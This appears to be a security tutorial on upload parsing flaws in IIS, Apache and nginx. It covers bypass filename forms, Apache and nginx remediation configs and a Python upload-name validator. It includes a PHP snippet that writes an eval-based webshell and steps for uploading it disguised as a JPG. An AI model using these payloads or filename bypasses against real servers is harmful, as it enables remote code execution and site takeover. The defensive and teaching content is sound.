Unsafe file download and upload: server-side upload parsing vulnerabilities

Server-side upload parsing vulnerabilities

Upload vulnerabilities: IIS 5.x-6.x parsing vulnerability

Servers running IIS 5.x-6.x are mostly Windows Server 2003 hosts serving fairly old sites, usually written in ASP. This parsing vulnerability only affects .asp files; it does not cause .aspx files to be parsed.

Directory parsing (6.0)

		Form: www.xxx.com/xx.asp/xx.jpg
		Principle: by default the server parses every file inside a directory named *.asp or *.asa as an ASP file.

File parsing

		Form: www.xxx.com/xx.asp;.jpg
		Principle: by default the server ignores everything after the semicolon, so xx.asp;.jpg is parsed as an ASP file.

Executable file types

		Besides .asp, IIS 6.0 treats these three extensions as executable by default:
			/test.asa
			/test.cer
			/test.cdx

Remediation

		1. There is currently no official Microsoft patch; you can write your own regular expression to block uploads with filenames of the xx.asp;.jpg form.
		2. Set permissions properly and prevent users from creating folders.

Apache parsing vulnerability (upload)

Vulnerability principle

Apache resolves a file's extensions from right to left: if the rightmost suffix is not recognised, it moves one step left and tries again. For example, in test.php.owf.rar the suffixes .owf and .rar are unknown to Apache, so Apache parses test.php.owf.rar as PHP.

Vulnerability form

		www.xxxx.xxx.com/test.php.php123

Other configuration issues that lead to the vulnerability

(1) If the Apache conf contains a line such as AddHandler php5-script .php, then any filename containing .php, e.g. test2.php.jpg, is executed as PHP.
(2) If the Apache conf contains a line such as AddType application/x-httpd-php .jpg, then files with the .jpg extension are likewise executed as PHP.

Remediation

		1. In the Apache configuration, forbid execution of files with ".php." in the name by adding:
<Files ~ "\.(php\.|php3\.)">
        Order Allow,Deny
        Deny from all
</Files>

2. Solve it with rewriting (pseudo-static): rewrite any file matching .php.* to /index.php. Open Apache's httpd.conf, find LoadModule rewrite_module modules/mod_rewrite.so,
remove the leading #, restart Apache, and create a .htaccess file in the site's root directory with the following content:

<IfModule mod_rewrite.c>
RewriteEngine On
# [NC] makes the match case-insensitive, covering pHp, PHP, phP3 and so on
RewriteRule \.(php\.|php3\.) /index.php [NC]
</IfModule>

nginx parsing vulnerability (upload)

Vulnerability principle

		By default nginx supports PHP through CGI, and the usual practice is to set SCRIPT_FILENAME in the nginx configuration with a regex match. When the URL www.xx.com/phpinfo.jpg/1.php is requested, $fastcgi_script_name is set to "phpinfo.jpg/1.php", which is then built into SCRIPT_FILENAME and passed to PHP CGI. Why does PHP accept such a parameter and parse phpinfo.jpg as a PHP file? That comes down to the fix_pathinfo option. If it is enabled, the following logic in PHP is triggered:
			PHP treats SCRIPT_FILENAME as phpinfo.jpg and 1.php as PATH_INFO, so it parses phpinfo.jpg as a PHP file.

Vulnerability form

		www.xxxx.com/UploadFiles/image/1.jpg/1.php
		www.xxxx.com/UploadFiles/image/1.jpg%00.php
		www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php
		xxx.jpg%00.php (Nginx <8.03 null-byte code execution vulnerability)
	Another technique: upload a file named test.jpg with the following content.

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
			Then request test.jpg/.php, and a one-line webshell shell.php is generated in that directory.

Remediation

		1. Edit php.ini and set cgi.fix_pathinfo to 0;
		2. Add the following to the nginx configuration:
		if ( $fastcgi_script_name ~ \..*\/.*php )
{
return 403;
}

This means that when the URL matches something like test.jpg/a.php, error code 403 is returned.

Upload vulnerabilities: IIS 7.5 / 8 parsing vulnerability
The IIS 7.5 vulnerability is similar to the nginx one: both come from cgi.fix_pathinfo being enabled in the PHP configuration file, not from a flaw in nginx or IIS 7.5 itself.
https://www.xp.cn/a.php/182.html
After installation, php.ini has cgi.fix_pathinfo = 1 by default; when a URL path is requested with .php appended, the file is parsed as PHP, which produces the vulnerability.
Note: before the actual test I found no vulnerability; later I discovered that FastCGI had to be enabled, which seems to be what processes the file.
For defence, set cgi.fix_pathinfo = 0 and keep FastCGI enabled; that way you can go a step further.
Create a cmd.txt file with the contents

<?php
				fputs(fopen('shell.php','w'),'<?php  phpinfo();?>');
				// create a new file
				?>
		After saving, rename it to cmd.jpg
		and request it again.
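The IIS, Apache and nginx remediation sections above all come down to the same upload-side rule: never let a user-supplied filename carry a second extension, a path separator, a semicolon or a NUL byte. The following is an added example (not code from the original post) of a server-side filename check that enforces that rule for an image upload endpoint; the allow-list of image extensions and the set of executable extensions are assumptions for this example.

```python
import re
import secrets
from typing import Optional

# Extensions the sections above show being executed server-side:
# IIS 6 (asp, asa, cer, cdx) and the Apache/nginx PHP handlers. Assumed set.
EXECUTABLE_EXTS = {"asp", "asa", "cer", "cdx", "aspx", "php", "php3", "php5", "phtml"}
# Allow-list for an image upload endpoint (assumption made for this example).
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif"}


def is_safe_upload_name(name: str) -> bool:
    """True only if `name` cannot trigger the parsing tricks described above.

    Rejected: '/' and '\\' (IIS 6 xx.asp/xx.jpg, nginx 1.jpg/1.php),
    ';' (IIS 6 xx.asp;.jpg), NUL and other control bytes plus '%' so that
    1.jpg%00.php fails whether or not it was URL-decoded, any executable
    extension anywhere in the dotted name (Apache's right-to-left matching
    of test.php.owf.rar, AddHandler on test2.php.jpg), and any final
    extension that is not in the allow-list.
    """
    if not name or len(name) > 255:
        return False
    if re.search(r"[\x00-\x1f/\\;%]", name):
        return False
    parts = name.lower().split(".")
    # Need a basename plus at least one extension, and no empty segments
    # (rejects ".jpg", "a..jpg" and a trailing dot).
    if len(parts) < 2 or "" in parts:
        return False
    # Every segment after the basename is a candidate extension for Apache,
    # so none of them may be executable.
    if any(p in EXECUTABLE_EXTS for p in parts[1:]):
        return False
    return parts[-1] in ALLOWED_EXTS


def stored_name(name: str) -> Optional[str]:
    """Server-side name to store an accepted upload under: a random stem plus
    the validated extension, so no user-controlled characters reach the disk.
    Returns None when the upload should be refused."""
    if not is_safe_upload_name(name):
        return None
    ext = name.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"
```

This check does not inspect file contents, so a cmd.jpg containing PHP still passes it; the php.ini (cgi.fix_pathinfo = 0) and nginx/Apache configuration fixes above remain necessary.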

Note

			When phpstudy is switched back, it may not run and needs to be reconfigured.